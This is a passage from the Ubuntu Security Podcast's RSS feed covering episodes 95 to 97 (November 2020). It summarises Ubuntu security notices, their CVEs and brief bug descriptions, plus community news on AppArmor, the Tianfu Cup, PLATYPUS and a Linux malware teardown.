(note these don&rsquo;t normally exist unless you manually create one so in
general is not an issue) - this fixes that and introduces some more
hardening measures to try and ensure permissions are always dropped
correctly and this is more robust overall</li>
</ul>
<h3 id="usn-4631-1-libmaxminddb-vulnerability-06-50">[<a href="https://ubuntu.com/security/notices/USN-4631-1">USN-4631-1</a>] libmaxminddb vulnerability [06:50]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-28241">CVE-2020-28241</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Heap based buffer overread -&gt; DoS</li>
</ul>
<h3 id="usn-4632-1-slirp-vulnerabilities-07-03">[<a href="https://ubuntu.com/security/notices/USN-4632-1">USN-4632-1</a>] SLiRP vulnerabilities [07:03]</h3>
<ul>
<li>2 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-8608">CVE-2020-8608</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-7039">CVE-2020-7039</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 different buffer overflows - 1 due to improper use of return value from
snprintf() - the other due to mishandling of pointer arithmetic -&gt; DoS,
RCE?</li>
</ul>
<h3 id="usn-4607-2-openjdk-regressions">[<a href="https://ubuntu.com/security/notices/USN-4607-2">USN-4607-2</a>] OpenJDK regressions</h3>
<ul>
<li>8 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-14803">CVE-2020-14803</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14798">CVE-2020-14798</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14797">CVE-2020-14797</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14796">CVE-2020-14796</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14792">CVE-2020-14792</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14782">CVE-2020-14782</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14781">CVE-2020-14781</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14779">CVE-2020-14779</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4633-1-postgresql-vulnerabilities-07-42">[<a href="https://ubuntu.com/security/notices/USN-4633-1">USN-4633-1</a>] PostgreSQL vulnerabilities [07:42]</h3>
<ul>
<li>3 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-25696">CVE-2020-25696</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25695">CVE-2020-25695</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25694">CVE-2020-25694</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>1 RCE, 1 arbitrary SQL execution but need to be an authenticated user and
1 DoS via dropping of connection</li>
</ul>
<h3 id="usn-4634-1-openldap-vulnerabilities-08-03">[<a href="https://ubuntu.com/security/notices/USN-4634-1">USN-4634-1</a>] OpenLDAP vulnerabilities [08:03]</h3>
<ul>
<li>2 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-25710">CVE-2020-25710</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25709">CVE-2020-25709</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 more DoS bugs against OpenLDAP - both assertion failures able to be
triggered by a remote attacker</li>
</ul>
<h3 id="usn-4635-1-kerberos-vulnerability-08-29">[<a href="https://ubuntu.com/security/notices/USN-4635-1">USN-4635-1</a>] Kerberos vulnerability [08:29]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-28196">CVE-2020-28196</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>DoS via unbounded recursion in parsing of ASN.1 encoded message - BER can
specify an indefinite length - so this was parsed recursively but since
it never placed any limit on this if the nesting was deep enough, could
overrun the stack an trigger an abort.</li>
</ul>
<h3 id="usn-4636-1-libvncserver-vino-vulnerability-09-05">[<a href="https://ubuntu.com/security/notices/USN-4636-1">USN-4636-1</a>] LibVNCServer, Vino vulnerability [09:05]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-25708">CVE-2020-25708</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Divide by zero -&gt; DoS</li>
</ul>
<h3 id="usn-4637-1-firefox-vulnerabilities-09-18">[<a href="https://ubuntu.com/security/notices/USN-4637-1">USN-4637-1</a>] Firefox vulnerabilities [09:18]</h3>
<ul>
<li>15 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-26969">CVE-2020-26969</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26968">CVE-2020-26968</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26967">CVE-2020-26967</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26965">CVE-2020-26965</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26963">CVE-2020-26963</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26962">CVE-2020-26962</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26961">CVE-2020-26961</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26960">CVE-2020-26960</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26959">CVE-2020-26959</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26958">CVE-2020-26958</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26956">CVE-2020-26956</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26953">CVE-2020-26953</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26952">CVE-2020-26952</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26951">CVE-2020-26951</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-16012">CVE-2020-16012</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>83.0</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="migration-of-ubuntu-cve-information-from-people-dot-canonical-dot-com-to-ubuntu-dot-com-09-37">Migration of Ubuntu CVE information from people.canonical.com to ubuntu.com [09:37]</h3>
<ul>
<li>Long time in the making - worked with the design team at Canonical to
design and prototype display of CVEs in a more human friendly format (for
machine friendly we have OVAL etc)</li>
<li>ubuntu.com/security/CVE-XXXX-XXXX</li>
<li>Still includes CVE description, priority, status per-release and other
details - but focusses on the most salient ones rather than the more
engineering style of the old ones</li>
<li>Redirects in place for old people.canonical.com URLs</li>
</ul>
<h3 id="securing-linux-machines-with-apparmor-webinar-11-18">Securing Linux Machines with AppArmor Webinar [11:18]</h3>
<ul>
<li><a href="https://www.brighttalk.com/webcast/6793/440491/securing-linux-machines-with-apparmor">https://www.brighttalk.com/webcast/6793/440491/securing-linux-machines-with-apparmor</a></li>
<li>2020-11-24 16:00 UTC</li>
<li>Presented by Mike Salvatore - who also wrote the <a href="https://ubuntu.com/engage/apparmor-intro">Introduction to AppArmor whitepaper</a></li>
<li>Will cover:
<ul>
<li>Why a ‘defence in depth’ strategy should be employed to mitigate the
potential damage caused by a breach</li>
<li>An explanation of AppArmor, its key features and why the principle of
least privilege is recommended</li>
<li>The use of AppArmor in Ubuntu and snaps</li>
</ul>
</li>
<li>Good overview of why and how to apply AppArmor as well as a demo of how
to generate a profile to confine an application with <a href="http://manpages.ubuntu.com/manpages/focal/man8/aa-genprof.8.html">`aa-genprof`</a></li>
</ul>
<h3 id="analysis-of-the-dovecat-and-hy4-linux-malware-12-36">Analysis of the dovecat and hy4 Linux Malware [12:36]</h3>
<ul>
<li><a href="https://ruffell.nz/reverse-engineering/writeups/2020/10/27/analysis-of-the-dovecat-and-hy4-linux-malware.html">https://ruffell.nz/reverse-engineering/writeups/2020/10/27/analysis-of-the-dovecat-and-hy4-linux-malware.html</a></li>
<li>By Matthew Ruffell from the Sustaining Engineering team at Canonical</li>
<li>Previously maintained his own Linux distro (Dapper Linux) where he
manually forward-ported the grsecurity patch set - topic of his LCA 2019
talk <a href="https://2019.linux.conf.au/schedule/presentation/180/">Maintaining the Unmaintainable: Picking up the Baton of a Secure
Kernel Patchset</a></li>
<li>Walks through how he root-caused strange behaviour on a system down to
some suspicious processes, and then reverse engineering those to
demonstrate they were malware, and explaining what the malware did, how
it operated etc - great teardown</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E097.mp3" length="11970527" type="audio/mpeg" /><itunes:duration>15:11</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 96
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-96/</link>
          <pubDate>Fri, 13 Nov 2020 12:35:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>a8a286ea39af7b2c410ede63c6bf029b5fccd93cb43dccf2476380d0f6419fffc19a5f30bfdd1617b6608e5f65eeb5fb4d9f989b2553202e5b6573ffb5d5be36</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 96</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we look at results from the Tianfu Cup 2020, the PLATYPUS attack
  against Intel CPUs, a detailed writeup of the GDM/accountsservice
  vulnerabilities covered in [Episode 95](https://ubuntusecuritypodcast.org/episode-95/) and more....
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we look at results from the Tianfu Cup 2020, the PLATYPUS attack
  against Intel CPUs, a detailed writeup of the GDM/accountsservice
  vulnerabilities covered in [Episode 95](https://ubuntusecuritypodcast.org/episode-95/) and more.
  </itunes:summary>
        <description>  This week we look at results from the Tianfu Cup 2020, the PLATYPUS attack
  against Intel CPUs, a detailed writeup of the GDM/accountsservice
  vulnerabilities covered in [Episode 95](https://ubuntusecuritypodcast.org/episode-95/) and more.
  </description>
        <googleplay:description>  This week we look at results from the Tianfu Cup 2020, the PLATYPUS attack
  against Intel CPUs, a detailed writeup of the GDM/accountsservice
  vulnerabilities covered in [Episode 95](https://ubuntusecuritypodcast.org/episode-95/) and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at results from the Tianfu Cup 2020, the PLATYPUS attack
against Intel CPUs, a detailed writeup of the GDM/accountsservice
vulnerabilities covered in <a href="https://ubuntusecuritypodcast.org/episode-95/">Episode 95</a> and more.</p>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="tianfu-cup-2020-00-37">Tianfu Cup 2020 [00:37]</h3>
<ul>
<li><a href="https://www.zdnet.com/article/windows-10-ios-chrome-and-many-others-fall-at-chinas-top-hacking-contest/">https://www.zdnet.com/article/windows-10-ios-chrome-and-many-others-fall-at-chinas-top-hacking-contest/</a></li>
<li>QEMU on Ubuntu, Firefox and docker all pwned (as well as Chrome, Safari,
VMWare ESXi, CentOS 8, iPhone etc)</li>
<li>qemu-kvm on Ubuntu - used a UAF and an info-leak to escape VM and get
root code exec on host - by Xiao Wei from 360 ESG Vuln Research Institute
who has previously found lots of QEMU bugs - $60k</li>
<li>Still waiting on upstream qemu / docker to release details - Firefox
already patched in <a href="https://ubuntu.com/security/CVE-2020-26950">CVE-2020-26950</a></li>
</ul>
<h3 id="github-writeup-of-gdm-accountsservice-vulnerabilities-02-53">Github writeup of GDM/accountsservice vulnerabilities [02:53]</h3>
<ul>
<li>We covered the vulns in last week&rsquo;s <a href="https://ubuntusecuritypodcast.org/episode-95/">Episode 95</a></li>
<li>Kevin Backhouse provides a great amount of detail and a cool demo video
of the attack -
<a href="https://securitylab.github.com/research/Ubuntu-gdm3-accountsservice-LPE">https://securitylab.github.com/research/Ubuntu-gdm3-accountsservice-LPE</a></li>
<li><a href="https://portswigger.net/daily-swig/vulnerabilities-in-ubuntu-desktop-enabled-root-access-in-two-simple-steps">https://portswigger.net/daily-swig/vulnerabilities-in-ubuntu-desktop-enabled-root-access-in-two-simple-steps</a></li>
</ul>
<h3 id="platypus-attack-against-intel-cpus-03-41">PLATYPUS attack against Intel CPUs [03:41]</h3>
<ul>
<li><a href="https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/Platypus">https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/Platypus</a></li>
<li><a href="https://platypusattack.com/">https://platypusattack.com/</a></li>
<li><a href="https://www.zdnet.com/article/new-platypus-attack-can-steal-data-from-intel-cpus/">https://www.zdnet.com/article/new-platypus-attack-can-steal-data-from-intel-cpus/</a></li>
</ul>
<h2 id="this-week-in-ubuntu-security-updates-05-27">This week in Ubuntu Security Updates [05:27]</h2>
<p>23 unique CVEs addressed</p>
<h3 id="usn-4617-1-spice-vdagent-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-4617-1">USN-4617-1</a>] SPICE vdagent vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-25653">CVE-2020-25653</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25652">CVE-2020-25652</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25651">CVE-2020-25651</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25650">CVE-2020-25650</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4616-2-accountsservice-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-4616-2">USN-4616-2</a>] AccountsService vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-14036">CVE-2018-14036</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-16126">CVE-2020-16126</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4618-1-tmux-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-4618-1">USN-4618-1</a>] tmux vulnerability</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-27347">CVE-2020-27347</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4619-1-dom4j-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-4619-1">USN-4619-1</a>] dom4j vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-1000632">CVE-2018-1000632</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4599-3-firefox-regressions">[<a href="https://ubuntu.com/security/notices/USN-4599-3">USN-4599-3</a>] Firefox regressions</h3>
<ul>
<li>Affecting Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-94/">Episode 94</a></li>
</ul>
<h3 id="usn-4620-1-phpldapadmin-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-4620-1">USN-4620-1</a>] phpLDAPadmin vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2017-11107">CVE-2017-11107</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4621-1-netqmail-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-4621-1">USN-4621-1</a>] netqmail vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-3812">CVE-2020-3812</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-3811">CVE-2020-3811</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2005-1515">CVE-2005-1515</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2005-1514">CVE-2005-1514</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2005-1513">CVE-2005-1513</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4622-1-openldap-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-4622-1">USN-4622-1</a>] OpenLDAP vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-25692">CVE-2020-25692</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4623-1-pacemaker-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-4623-1">USN-4623-1</a>] Pacemaker vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-25654">CVE-2020-25654</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4624-1-libexif-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-4624-1">USN-4624-1</a>] libexif vulnerability</h3>
<ul>
<li>1 CVEs addressed in Precise ESM (12.04 ESM), Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-0452">CVE-2020-0452</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4625-1-firefox-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-4625-1">USN-4625-1</a>] Firefox vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-26950">CVE-2020-26950</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4626-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-4626-1">USN-4626-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-8694">CVE-2020-8694</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27194">CVE-2020-27194</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4627-1-linux-kernel-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-4627-1">USN-4627-1</a>] Linux kernel vulnerability</h3>
<ul>
<li>1 CVEs addressed in Precise ESM (12.04 ESM), Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-8694">CVE-2020-8694</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-4628-1-intel-microcode-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-4628-1">USN-4628-1</a>] Intel Microcode vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-8698">CVE-2020-8698</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-8696">CVE-2020-8696</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-8695">CVE-2020-8695</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E096.mp3" length="6184754" type="audio/mpeg" /><itunes:duration>07:41</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 95
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-95/</link>
          <pubDate>Fri, 06 Nov 2020 15:37:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>ba46e855fee07787637c03dbae315570f4d3e269fbdcfd0fdbebf21815b0ebeb93d13f039e8cc3d431ce4078ed423070925cc9b3a6592d96c6e4c52107d34bee</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 95</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we look at vulnerabilities in Samba, GDM, AccountsService, GOsa
  and more, plus we cover some AppArmor related Ubuntu Security community
  updates as well.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we look at vulnerabilities in Samba, GDM, AccountsService, GOsa
  and more, plus we cover some AppArmor related Ubuntu Security community
  updates as well.
  </itunes:summary>
        <description>  This week we look at vulnerabilities in Samba, GDM, AccountsService, GOsa
  and more, plus we cover some AppArmor related Ubuntu Security community
  updates as well.
  </description>
        <googleplay:description>  This week we look at vulnerabilities in Samba, GDM, AccountsService, GOsa
  and more, plus we cover some AppArmor related Ubuntu Security community
  updates as well.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at vulnerabilities in Samba, GDM, AccountsService, GOsa
and more, plus we cover some AppArmor related Ubuntu Security community
updates as well.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>26 unique CVEs addressed</p>
<h3 id="usn-4552-3-pam-python-regression-00-40">[<a href="https://usn.ubuntu.com/4552-3/">USN-4552-3</a>] Pam-python regression [00:40]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-16729">CVE-2019-16729</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Original update (<a href="https://ubuntusecuritypodcast.org/episode-92/">Episode 92</a> - bionic), (<a href="https://ubuntusecuritypodcast.org/episode-94/">Episode 94</a> - xenial) caused was
too restrictive and would disallow PAM modules written in python from
importing python modules from site-specific directories</li>
</ul>
<h3 id="usn-4609-1-gosa-vulnerabilities-01-18">[<a href="https://usn.ubuntu.com/4609-1/">USN-4609-1</a>] GOsa vulnerabilities [01:18]</h3>
<ul>
<li>3 CVEs addressed in Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-1000528">CVE-2018-1000528</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11187">CVE-2019-11187</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14466">CVE-2019-14466</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>PHP based LDAP user admin frontend</li>
<li>XSS attacks via the change password form</li>
<li>Could login to any account with a username containing &ldquo;success&rdquo; with any
arbitrary password</li>
<li>Cookie mishandling allowed an authenticated user to delete files on the
web server in the context of the user account running the web server</li>
</ul>
<h3 id="usn-4610-1-fastd-vulnerability-02-11">[<a href="https://usn.ubuntu.com/4610-1/">USN-4610-1</a>] fastd vulnerability [02:11]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-27638">CVE-2020-27638</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Fast &amp; secure tunnelling daemon</li>
<li>Failed to free rx buffers in certain circumstances - memory leak -&gt; DoS</li>
</ul>
<h3 id="usn-4611-1-samba-vulnerabilities-02-29">[<a href="https://usn.ubuntu.com/4611-1/">USN-4611-1</a>] Samba vulnerabilities [02:29]</h3>
<ul>
<li>3 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-14383">CVE-2020-14383</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14323">CVE-2020-14323</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14318">CVE-2020-14318</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 different DoS issues - remote attacker could cause DNS server to crash
by supplying invalid DNS records, or could cause winbind to crash via
crafted winbind requests</li>
<li>Failed to check permissions on ChangeNotify - so an attacker could
subscribe to get notifications on files they did not have permission to
read - and so leaks file info</li>
</ul>
<h3 id="usn-4605-2-blueman-update-03-22">[<a href="https://usn.ubuntu.com/4605-2/">USN-4605-2</a>] Blueman update [03:22]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-15238">CVE-2020-15238</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-94/">Episode 94</a> - this includes additional fix so that on focal and groovy
policykit is used to authenticate privileged actions</li>
</ul>
<h3 id="usn-4614-1-gdm-vulnerability-03-55">[<a href="https://usn.ubuntu.com/4614-1/">USN-4614-1</a>] GDM vulnerability [03:55]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-16125">CVE-2020-16125</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Kevin Backhouse - discovered 3 vulnerabilities - one in GDM, 2 in
AccountsService</li>
<li>GDM incorrectly launched the initial setup tool if it could not reach the
accountsservice daemon</li>
<li>If could cause accountsservice to be unresponsive, could get GDM to
luanch initial setup tool which then allows a local user to create a
privileged users account</li>
<li>But requires accountsservice to be unresponsive&hellip;</li>
</ul>
<h3 id="usn-4616-1-accountsservice-vulnerabilities-05-00">[<a href="https://usn.ubuntu.com/4616-1/">USN-4616-1</a>] AccountsService vulnerabilities [05:00]</h3>
<ul>
<li>3 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-14036">CVE-2018-14036</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-16127">CVE-2020-16127</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-16126">CVE-2020-16126</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Drops privileges for certain operations but does so where a local
unprivileged user can send it SIGSTOP signal - is now unresponsive - so
could allow the GDM attack above - or could cause it to crash (send
SIGSEGV etc)</li>
<li>Also would exhaust all memory when reading .pam_environment if it was
really large (ie symlink to /dev/zero) - again could cause it to hang /
crash -&gt; DoS</li>
</ul>
<h3 id="usn-4613-1-python-cryptography-vulnerability-06-34">[<a href="https://usn.ubuntu.com/4613-1/">USN-4613-1</a>] python-cryptography vulnerability [06:34]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
